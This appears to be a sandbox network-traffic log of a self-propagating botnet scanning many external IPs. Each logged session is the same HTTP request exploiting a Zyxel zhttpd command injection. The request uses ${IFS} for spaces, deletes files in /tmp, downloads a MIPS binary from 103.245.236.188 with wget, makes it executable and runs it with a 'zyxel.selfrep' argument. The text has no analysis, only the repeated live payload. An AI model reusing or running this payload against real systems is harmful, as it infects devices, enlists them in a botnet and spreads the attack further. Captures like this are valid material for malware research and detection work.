                                                Jan 12, 2024 18:16:16.280802011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2755192.168.2.2345112170.245.225.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280838966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2756192.168.2.2338362202.247.132.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280888081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2757192.168.2.2350658172.171.97.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280925035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2758192.168.2.2337708198.244.114.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280966997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2759192.168.2.2357596141.204.75.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281014919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2760192.168.2.234941620.218.97.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281047106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2761192.168.2.2359956129.58.181.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281112909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2762192.168.2.234065897.52.33.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281164885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2763192.168.2.233615047.108.221.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281213045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2764192.168.2.2346454114.124.57.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281244040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2765192.168.2.234698673.208.62.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281295061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2766192.168.2.2352584131.229.181.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281317949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2767192.168.2.2354258220.212.94.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281363964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2768192.168.2.235182476.170.107.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281424046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2769192.168.2.2348872194.206.94.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281459093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2770192.168.2.235607612.187.188.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281511068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2771192.168.2.234780663.133.62.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281555891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2772192.168.2.2360216169.187.225.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281589031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2773192.168.2.233800886.25.252.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281651974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2774192.168.2.235940637.42.144.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281706095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2775192.168.2.2345842223.176.189.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281760931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2776192.168.2.2343978194.144.208.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281800032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2777192.168.2.2359724111.194.202.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281824112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2778192.168.2.2349776171.210.152.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281860113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2779192.168.2.234309884.59.223.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281897068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2780192.168.2.2347566191.178.117.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.281949997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2781192.168.2.235757259.106.149.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282004118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2782192.168.2.2345964156.37.69.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282021999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2783192.168.2.2346824197.100.134.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282071114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2784192.168.2.2351540114.21.80.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282099009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2785192.168.2.235662061.192.12.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282130003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2786192.168.2.2360176222.129.168.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282150030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2787192.168.2.235960638.19.115.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282207012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2788192.168.2.2342474197.71.32.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282267094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2789192.168.2.2346498105.2.73.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282300949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2790192.168.2.234801493.237.145.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282356977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2791192.168.2.2337366133.244.49.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282377005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2792192.168.2.234913091.123.113.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282428026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2793192.168.2.2345880106.30.135.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282478094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2794192.168.2.233841646.219.55.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282527924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2795192.168.2.2336134172.48.53.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282586098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2796192.168.2.2342682185.137.17.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282613993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2797192.168.2.236094042.163.17.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282677889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2798192.168.2.234315034.41.182.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282742977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2799192.168.2.2356774174.57.56.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282804966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2800192.168.2.2351816169.95.127.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282835007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2801192.168.2.234008275.213.120.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282881021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2802192.168.2.2336678164.73.91.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282913923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2803192.168.2.233682057.56.226.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.282943964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2804192.168.2.233477012.65.13.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283004045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2805192.168.2.2341970123.97.234.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283035994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2806192.168.2.2355476125.94.205.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283087015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2807192.168.2.234893812.100.5.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283128023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2808192.168.2.23499889.91.54.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283179998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2809192.168.2.2340162179.154.200.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283217907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2810192.168.2.2351846206.175.184.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283257961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2811192.168.2.2352974196.128.126.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283282042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2812192.168.2.235983661.215.76.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283319950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2813192.168.2.2353590189.49.123.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283356905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2814192.168.2.235713623.10.175.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283421040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2815192.168.2.2341478132.145.39.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283442020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2816192.168.2.2351736101.70.182.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.283493042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2817192.168.2.23441481.117.165.118443
                                                TimestampBytes transferredDirectionData
